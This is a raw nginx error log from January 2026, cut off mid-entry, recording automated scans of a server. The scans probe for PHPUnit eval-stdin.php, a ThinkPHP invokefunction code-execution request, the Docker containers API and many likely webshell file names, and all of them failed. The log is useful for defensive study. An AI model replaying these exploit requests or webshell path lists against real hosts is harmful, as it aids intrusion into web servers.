*311925 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:29 [error] 422#422: *311925 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:29 [error] 422#422: *311925 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:29 [error] 422#422: *311925 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:29 [error] 422#422: *311925 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:29 [error] 422#422: *311925 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:29 [error] 422#422: *311925 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:30 [error] 422#422: *311925 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:30 [error] 422#422: *311925 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:30 [error] 422#422: *311925 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:30 [error] 422#422: *311925 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:30 [error] 422#422: *311925 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:30 [error] 422#422: *311925 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:31 [error] 422#422: *311925 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:31 [error] 422#422: *311925 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:31 [error] 422#422: *311925 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:31 [error] 422#422: *311925 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:31 [error] 422#422: *311925 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:31 [error] 422#422: *311925 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:31 [error] 422#422: *311925 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:32 [error] 422#422: *311925 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:32 [error] 422#422: *311925 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:32 [error] 422#422: *311925 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:32 [error] 422#422: *311925 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:32 [error] 422#422: *311925 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:32 [error] 422#422: *311925 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:32 [error] 422#422: *311925 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:33 [error] 422#422: *311925 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:30:33 [error] 422#422: *311925 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 212.56.47.141, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:41:53 [error] 422#422: *311934 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 65.49.1.192, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "91.82.83.208" +2026/01/19 08:42:49 [error] 422#422: *311945 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 23.94.162.106, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 08:44:15 [error] 424#424: *313436 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 65.49.1.192, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "91.82.83.208" +2026/01/19 09:04:08 [error] 424#424: *313452 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 93.174.95.106, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "91.82.83.208" +2026/01/19 09:04:08 [error] 424#424: *313453 open() "/var/www/html/sitemap.xml" failed (2: No such file or directory), client: 93.174.95.106, server: localhost-nginx-proxy-manager, request: "GET /sitemap.xml HTTP/1.1", host: "91.82.83.208" +2026/01/19 09:04:09 [error] 424#424: *313454 open() "/var/www/html/.well-known/security.txt" failed (2: No such file or directory), client: 93.174.95.106, server: localhost-nginx-proxy-manager, request: "GET /.well-known/security.txt HTTP/1.1", host: "91.82.83.208" +2026/01/19 09:24:09 [error] 423#423: *314958 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 23.94.162.106, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 10:06:27 [error] 423#423: *314993 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 23.94.162.106, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "91.82.83.208:80" +2026/01/19 10:31:55 [error] 424#424: *315014 open() "/var/www/html/wp-content/plugins/hellopress/wp_filemanager.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:31:55 [error] 424#424: *315014 open() "/var/www/html/eee.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /eee.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:31:56 [error] 424#424: *315014 open() "/var/www/html/webadmin.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /webadmin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:31:56 [error] 424#424: *315014 open() "/var/www/html/galex.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /galex.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:31:56 [error] 424#424: *315014 open() "/var/www/html/tinyfilemanager.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /tinyfilemanager.php?p= HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:31:56 [error] 424#424: *315014 open() "/var/www/html/class.api.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /class.api.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:31:56 [error] 424#424: *315014 open() "/var/www/html/support.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /support.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:31:57 [error] 424#424: *315014 open() "/var/www/html/wp-content/themes/finley/min.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /wp-content/themes/finley/min.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:31:57 [error] 424#424: *315014 open() "/var/www/html/dox.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /dox.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:31:57 [error] 424#424: *315014 open() "/var/www/html/siteheads.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /siteheads.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:31:57 [error] 424#424: *315014 open() "/var/www/html/0x.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /0x.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:31:58 [error] 424#424: *315014 open() "/var/www/html/wp-admin/images/admin.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/images/admin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:31:58 [error] 424#424: *315014 open() "/var/www/html/wp-logout.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /wp-logout.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:31:58 [error] 424#424: *315014 open() "/var/www/html/87.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /87.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:31:58 [error] 424#424: *315014 open() "/var/www/html/0o0.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /0o0.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:31:58 [error] 424#424: *315014 open() "/var/www/html/lv.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /lv.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:31:58 [error] 424#424: *315014 open() "/var/www/html/dropdown.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /dropdown.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:31:59 [error] 424#424: *315014 open() "/var/www/html/wsheet1.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /wsheet1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:31:59 [error] 424#424: *315014 open() "/var/www/html/wp-admin/css/colors/about.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/css/colors/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:31:59 [error] 424#424: *315014 open() "/var/www/html/size.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /size.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:31:59 [error] 424#424: *315014 open() "/var/www/html/ms-users.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /ms-users.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:31:59 [error] 424#424: *315014 open() "/var/www/html/wp-admin/js/about.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/js/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:00 [error] 424#424: *315014 open() "/var/www/html/goods.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /goods.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:00 [error] 424#424: *315014 open() "/var/www/html/revision.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /revision.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:00 [error] 424#424: *315014 open() "/var/www/html/12.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /12.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:00 [error] 424#424: *315014 open() "/var/www/html/wp-includes/Text/about.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /wp-includes/Text/about.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:00 [error] 424#424: *315014 open() "/var/www/html/img.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /img.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:00 [error] 424#424: *315014 open() "/var/www/html/menu.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /menu.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:01 [error] 424#424: *315014 open() "/var/www/html/tinyfilemanager.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /tinyfilemanager.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:01 [error] 424#424: *315014 open() "/var/www/html/test1.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /test1.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:01 [error] 424#424: *315014 open() "/var/www/html/shell20211028.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /shell20211028.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:01 [error] 424#424: *315014 open() "/var/www/html/ton.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /ton.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:02 [error] 424#424: *315014 open() "/var/www/html/item.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /item.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:02 [error] 424#424: *315014 open() "/var/www/html/lala.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /lala.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:02 [error] 424#424: *315014 open() "/var/www/html/baxa1.phP8" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /baxa1.phP8 HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:02 [error] 424#424: *315014 open() "/var/www/html/page.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /page.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:02 [error] 424#424: *315014 open() "/var/www/html/tempfuns.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /tempfuns.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:03 [error] 424#424: *315014 open() "/var/www/html/past.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /past.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:03 [error] 424#424: *315014 open() "/var/www/html/log.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /log.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:03 [error] 424#424: *315014 open() "/var/www/html/wen.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /wen.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:03 [error] 424#424: *315014 open() "/var/www/html/wp-admin/js/index.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /wp-admin/js/index.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:03 [error] 424#424: *315014 open() "/var/www/html/sf.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /sf.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:03 [error] 424#424: *315014 open() "/var/www/html/simple.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET //simple.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:03 [error] 424#424: *315014 open() "/var/www/html/admiin.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /admiin.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:04 [error] 424#424: *315014 open() "/var/www/html/9v6.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /9v6.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:04 [error] 424#424: *315014 open() "/var/www/html/doc.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET //doc.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:04 [error] 424#424: *315014 open() "/var/www/html/ha.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /ha.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:04 [error] 424#424: *315014 open() "/var/www/html/F0x.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /F0x.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:05 [error] 424#424: *315014 open() "/var/www/html/file2.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /file2.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:05 [error] 424#424: *315014 open() "/var/www/html/cong.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /cong.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:05 [error] 424#424: *315014 open() "/var/www/html/a2.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /a2.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:05 [error] 424#424: *315014 open() "/var/www/html/up4.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /up4.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:05 [error] 424#424: *315014 open() "/var/www/html/gtc.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /gtc.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:05 [error] 424#424: *315014 open() "/var/www/html/dbc.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /dbc.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:05 [error] 424#424: *315014 open() "/var/www/html/xa.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /xa.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:06 [error] 424#424: *315014 open() "/var/www/html/content.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /content.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:06 [error] 424#424: *315014 open() "/var/www/html/oo.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /oo.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:06 [error] 424#424: *315014 open() "/var/www/html/info.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /info.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:06 [error] 424#424: *315014 open() "/var/www/html/ws35.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /ws35.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:06 [error] 424#424: *315014 open() "/var/www/html/222.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /222.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:06 [error] 424#424: *315014 open() "/var/www/html/z60.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /z60.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:07 [error] 424#424: *315014 open() "/var/www/html/wp-freya.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /wp-freya.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:07 [error] 424#424: *315014 open() "/var/www/html/ccou.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /ccou.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:07 [error] 424#424: *315014 open() "/var/www/html/abc.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /abc.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:07 [error] 424#424: *315014 open() "/var/www/html/ant.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /ant.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:07 [error] 424#424: *315014 open() "/var/www/html/ma.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /ma.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:07 [error] 424#424: *315014 open() "/var/www/html/gecko.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /gecko.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:07 [error] 424#424: *315014 open() "/var/www/html/ws29.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /ws29.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:07 [error] 424#424: *315014 open() "/var/www/html/1100.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /1100.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:08 [error] 424#424: *315014 open() "/var/www/html/ws46.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /ws46.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:08 [error] 424#424: *315014 open() "/var/www/html/ws43.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /ws43.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:08 [error] 424#424: *315014 open() "/var/www/html/ws36.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /ws36.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:08 [error] 424#424: *315014 open() "/var/www/html/ws34.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /ws34.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:08 [error] 424#424: *315014 open() "/var/www/html/rtx.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /rtx.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:08 [error] 424#424: *315014 open() "/var/www/html/as.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /as.php HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/01/19 10:32:09 [error] 424#424: *315014 open() "/var/www/html/ova.php" failed (2: No such file or directory), client: 4.213.174.69, server: localhost-nginx-proxy-manager, request: "GET /ova.php HTTP/1.1", host: 